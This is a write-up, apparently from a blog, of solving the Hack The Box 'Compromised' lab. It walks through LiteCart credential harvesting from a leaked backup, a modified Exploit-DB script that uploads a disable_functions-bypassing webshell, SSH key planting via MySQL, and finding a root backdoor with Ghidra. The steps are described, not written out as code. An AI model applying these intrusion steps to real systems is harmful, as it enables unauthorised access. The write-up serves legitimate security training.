Compromised from HTB is an incident response type box in which a Linux environment and eCommerce solution, LiteCart have been exploited. Utilizing some investigation, knowledge of code reading for both .PHP/.PY and a bit of luck I was able to root this box. I begin every scan using AutoRecon:

Website showing LiteCart is running.

After finishing the scans I noticed Port 80 was open. Visiting the website I was able to see an eCommerce solution LiteCart running. Looking through AutoRecon results I was able to see a /backup/ folder existed. If you are not using AutoRecon I would always recommend running Dirbuster and Nikto in any web server situation:

The backup folder had a single file a.tar.gz inside. I downloaded the file and extracted it. Inside I found a full backup of the LiteCart website. The first thing I tend to check is the file modification date.

Looking through the files I notice that this website has been previously compromised and this is more of an incident style box. I first grab database credentials as the website states its using MySQL alongside PHP. Next, looking through the files I notice comments. What is weird though is you would expect these particular comments to be un-commented or removed? I also notice that on one of the comments when a username and password are submitted they are sent to a log file. Why would someone want that to happen?

After navigating to the log file I am able to get the credentials for the admin user. I log in to LiteCart via /admin/ and see that it is running LiteCart 2.1.2. I Google LiteCart 2.1.2 Exploit and find an exploit on Exploit DB.

HTB Forums Hints!

Running the script and navigating to the directory comes up with a blank page. sparkla from HTB hint gave me my next foothold to keep going. I changed the exploit script to include phpinfo();.

This gave me an extremely ugly output in my console but navigating to the URL gave a clean output of the phpinfo(). Removing print r.content from the script will stop the output. Viewing the phpinfo() will show that a lot of functions have been disabled restricting a traditional shell.

disabled_functions within phpinfo()

A bunch of options are available to bypass disable_functions restrictions within PHP. Due to this, I went over to an infamous repo, carlospolop in search of his phpwebshelllimited. For those who are unaware he is also the creator of PEASS, one of the best privilege escalation script suites available.

I saved the file as disabledfunctions.php and proceeded to alter 45267.py to import the file.

I also changed the request/print areas to make sure the response completed and OCD…

Navigating to the displayed URL you should be presented with a shell (a bad one but still a shell) to continue lateral movement.

The shell in all its glory.

Running the command cat etc/passwd will show you that MySQL has a profile. We also already have (from good enumeration earlier) the MySQL password from the backup file. This next step took me a while but I recommend reading through this. Running below I could see that exec_cmd was running which would allow me to run commands as MySQL.

exec_cmd function available.

Next I created an SSH key on my parrot machine. I did this because of a comment in the HTB forums by Sys7em.

“key” “gen“erally you say…

Using the hint alongside the article here I was able to create the key and deploy it to the box.

Logged into the box as mysql@compromised

Using the etc/passwd data from earlier as well as navigating to the how directory shows me I am looking for the sysadmin user next. I tried to download linPEAS to the machine before I realized I couldn’t form a connection. Next steps were manual search methods.

Why is that password so much stronger?

Immediately I noticed a password I had been using was changed on a line of data that came up. I tried the password and successfully logged into sysadmin. After logging into sysadmin I began searching for priv-esc. I was stumped for a while on this part and don’t want to give too much away. The one that I can say is as this is an ‘incident response‘ style box you should look for how the person before you has been doing .things. How have they .named files? How have they covered there tracks?

After finding the needed file I copied it to my local machine with scp.

This part took me an extremely long time as I have never done any type of file investigation before. People on the HTB forum pointed me to Ghidra. This will require JDK which you can get here. Once installed I copied the file from my Parrot OS over to my Windows machine. With the assistance of a friend and a PM on the HTB forum, I was able to find a backdoor function.

Backdoor function. I hated my life at this point.

If you trace this function and convert both backdoor strings you will have the password for root.

HTB Compromised rooted